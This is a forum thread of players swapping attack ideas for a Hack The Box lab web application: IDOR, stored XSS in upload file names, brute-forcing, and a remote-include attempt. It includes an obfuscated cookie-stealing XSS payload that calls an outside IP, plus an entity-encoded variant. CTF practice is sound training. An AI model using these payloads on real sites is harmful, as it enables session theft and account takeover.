[osamy7593]

I user it on both ssh ports also .. Lol this machine is hard not medium

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[UnkownWombat]

yeah, i looked into a few options for command replacement as well or chaining the ping command with something else, not much luck so far but maybe its possible
i tried the first bit of rockyou for ssh brute force as well

[jsvensson]

Idor in creating comments.
idor in deleting files ,
stored XSS in file name
try <svg onload=alert()>.zip

Content-Disposition: form-data; name="attachment"; filename="<svg onload=alert()>.zip"
Content-Type: application/zip

xss works
i taught there's might be someone checking loading ticket 1-5 but no results.
i tried stealing cookie
<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8vMTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip
didnt work.

using fetch i can steal my own cookie but it's unlikely anyone is looking into these tickets

[osamy7593]

anyone wanna join my teamin htb DM me the team created 3 days ago and our rank
Is 60 ... Minimal required rank pro hacker .. If u been accepted i will enter u
In our disc server .. When DM send ur htb username

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[UnkownWombat]

anyone tried zzinter bruteforce on password ?

Used hydra for brute-forcing web pw... no success

Idor in creating comments.
idor in deleting files ,
stored XSS in file name
try <svg onload=alert()>.zip

Content-Disposition: form-data; name="attachment"; filename="<svg onload=alert()>.zip"
Content-Type: application/zip

xss works
i taught there's might be someone checking loading ticket 1-5 but no results.
i tried stealing cookie
<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8vMTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip
didnt work.

using fetch i can steal my own cookie but it's unlikely anyone is looking into these tickets

i think the idea of stealing cookie for user who made the tickets on teh admin panel is smart but not sure how to accomplish that

[ShitWhiffler]

I was able to use this to get the .zip file XSS to ping back to my web server, so I put one in each of the tickets to see if it'd at least come back before modifying it to grab the cookie, but nothing so far. Uses HTML entity encoding since the forward slashes seem to break it.

<IMG SRC=&#x2F;&#x2F;&#x31;&#x30;&#x2E;&#x31;&#x30;&#x2E;&#x78;&#x2E;&#x78;&#x3A;&#x78;&#x2B;&#x27;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x27;>

[andy1]

https://github.com/M507/CVE-2021-23017-PoC haft to be able to send spoofed  dns request to nginx not sure if can use this

https://nvd.nist.gov/vuln/detail/CVE-2021-23017

potential udp port 68 found in udp scan

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation

[nomx1337]

FTP protocol gives some feedback but remote includes are disabled
http://itrc.ssg.htb/?page=ftp://xxx:yyy@ip:port/file

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[nomx1337]

I wonder if because the hash function is always the same, if we can reference an upload based on a guessed hash of a file name for the other tickets. Maybe `malware.zip` and find the hash - then try `/uploads/<malware hash>.zip`?

Anyone looked into that yet?

its not the filename hash bro its a checksum over the content

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[sharknpls]

I was thinking the same, if you try to access ticket page without id parameter, you get this error

<div class="main"><br />
<b>Warning</b>:  Undefined array key "id" in <b>/var/www/itrc/ticket.php</b> on line <b>5</b><br />
<script>window.location = '/';</script>

Also there is a db.php file

Edit: oh you meant create_comment, it seems like vulnerable to IDOR, at least the response is {"status":"success"}

Closed tickets hint at other servers. Maybe need to track those down? Or find their specific pages?

```

Ticket ID
Subject
Status
1
Need SSH Access to HR Server
closed
2
Decommission ITRC SSH Certificate
closed
4
Please provision access to marketing servers
closed
```

How were you able to get the data of the closed ones?

I just got back on, but earlier before I was able to close all the tickets regardless of ID or ownership, tested it with separate accounts. As well as the comment on whatever ID you like as already mentioned prior in this thread.